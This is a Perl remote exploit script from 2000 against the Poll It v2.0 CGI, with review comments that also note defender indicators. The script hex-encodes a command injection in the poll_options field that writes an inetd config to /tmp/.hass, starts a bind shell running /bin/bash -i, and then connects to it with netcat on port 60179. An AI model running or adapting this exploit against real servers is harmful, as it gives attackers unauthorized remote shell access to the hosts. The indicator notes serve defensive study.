#!/usr/bin/perl


# | Remote exploit for Poll It v2.0 CGI / CGI-World.Com
# | Copyright (c) 2000 by <teleh0r@digit-labs.org> 
# | All rights reserved.
# |
# | http://www.digit-labs.org/ || digit-labs

use Socket; @char = qw(/ - \ \ |);   # spinner frames; qw() splits on whitespace, so "\ \" yields two "\" entries
# NOTE(review): no `use strict; use warnings;` -- every variable in this script
# is an undeclared package global, and $i in the wait loop below is read before
# it is ever assigned.
if (!($ARGV[0])) { die("Usage: $0 <target>\n"); }
$target = $ARGV[0];   # host name or dotted quad, taken as-is; interpolated into a shell command at the end

# The CGI query string, stored as \xNN escapes so the plaintext does not appear
# in the file. Decoded, it is an ordinary URL-encoded parameter list for
# poll.cgi: admin_password and entered_password (both set to the same value),
# action=add_option, add_option=1, and a poll_options value that is a shell
# command -- it writes a one-line inetd service definition (service "fido",
# tcp, nowait, user nobody, /bin/bash -i) to /tmp/.hass and then starts
# /usr/sbin/inetd on that file: a classic bind-shell backdoor. The "+" are
# URL-encoded spaces and the trailing "|" is part of the injected line.
# Defender notes: (1) this is a plain GET, so the whole payload is written to
# the web server's access log; (2) on the host, an inetd process started by
# the CGI's user with a configuration file under /tmp, and the /tmp/.hass path
# itself, are the indicators. Supplying both password fields with the same
# value suggests the CGI compared them against each other rather than against
# a stored secret -- inferred from the payload, not verifiable from this file.
$evilcode =
# Poll It v2.0 CGI portbinding c0de (TM)
"\x61\x64\x6d\x69\x6e\x5f\x70\x61\x73\x73\x77\x6f\x72".
"\x64\x3d\x68\x61\x73\x73\x26\x65\x6e\x74\x65\x72\x65".
"\x64\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x3d\x68\x61".
"\x73\x73\x26\x61\x63\x74\x69\x6f\x6e\x3d\x61\x64\x64".
"\x5f\x6f\x70\x74\x69\x6f\x6e\x26\x61\x64\x64\x5f\x6f".
"\x70\x74\x69\x6f\x6e\x3d\x31\x26\x70\x6f\x6c\x6c\x5f".
"\x6f\x70\x74\x69\x6f\x6e\x73\x3d\x65\x63\x68\x6f\x2b".
"\x27\x66\x69\x64\x6f\x2b\x73\x74\x72\x65\x61\x6d\x2b".
"\x74\x63\x70\x2b\x6e\x6f\x77\x61\x69\x74\x2b\x6e\x6f".
"\x62\x6f\x64\x79\x2b\x2f\x62\x69\x6e\x2f\x62\x61\x73".
"\x68\x2b\x62\x61\x73\x68\x2b\x2d\x69\x27\x2b\x3e\x2b".
"\x2f\x74\x6d\x70\x2f\x2e\x68\x61\x73\x73\x3b\x2f\x75".
"\x73\x72\x2f\x73\x62\x69\x6e\x2f\x69\x6e\x65\x74\x64".
"\x2b\x2f\x74\x6d\x70\x2f\x2e\x68\x61\x73\x73\x7c";

# Raw HTTP/1.1 request assembled by hand as one double-quoted string so that
# $evilcode and $target interpolate. Header lines are separated by bare LF
# (no CR), and only a single CRLF is appended at send time below, so no blank
# line terminates the header block. Referer and User-Agent are decorative.
$exploit =
"GET /cgi-bin/poll.cgi?$evilcode HTTP/1.1
Host: $target
Referer: http://teleh0r.cjb.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate, compress, identity
Content-Type: application/x-www-form-urlencoded";

print("** Sending evil GET command to $target now ...\n");

# Resolve the target and open a TCP connection to port 80. inet_aton() returns
# undef on a failed lookup without necessarily setting $!, so the "Error:"
# text may be empty or stale in that case; the same applies to sockaddr_in()
# and getprotobyname(). SOCKET is a bareword (package-global) filehandle.
$iaddr = inet_aton($target)                  || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr)             || die("Error: $!\n");
$proto = getprotobyname('tcp')               || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr)                      || die("Error: $!\n");
# send() returns the byte count (undef on error), so `|| die` only fires when
# nothing was written. The HTTP response is never read: the socket is closed
# immediately, and whether the CGI actually ran the command is never checked.
send(SOCKET,"$exploit\015\012", 0)           || die("Error: $!\n");
close(SOCKET);

# Cosmetic spinner that doubles as a delay so the injected inetd has time to
# start listening: 200 passes over the 5 frames, each frame shelling out to an
# external `usleep 99` (1000 fork/exec pairs in total). $i starts undef
# (numifies to 0) and '200' is a string literal compared numerically.
print("** Waiting to connect $target:fido (delay):  ");
while ($i < '200') {
    foreach $one (@char) {
        print("\b$one");
        system("usleep 99");
    }
    $i++;
}
print("\n\n");
# Interactive session over netcat: the echo primes the remote shell with
# `uname -mnrsp;w`, then `cat` forwards this terminal's stdin. Port 60179 is
# presumably what the "fido" service name in the injected inetd line resolves
# to in the target's /etc/services -- TODO confirm. system() is handed a single
# string, so it runs through /bin/sh with $target interpolated unquoted, and
# `echo -e` is not portable across /bin/sh implementations. For a defender,
# a new listener on 60179 on a web host, or an inbound connection to it
# followed by `uname -mnrsp;w`, is the network-level indicator of this tool.
system("(echo -e \"uname -mnrsp;w\n\"; cat) | nc $target 60179");
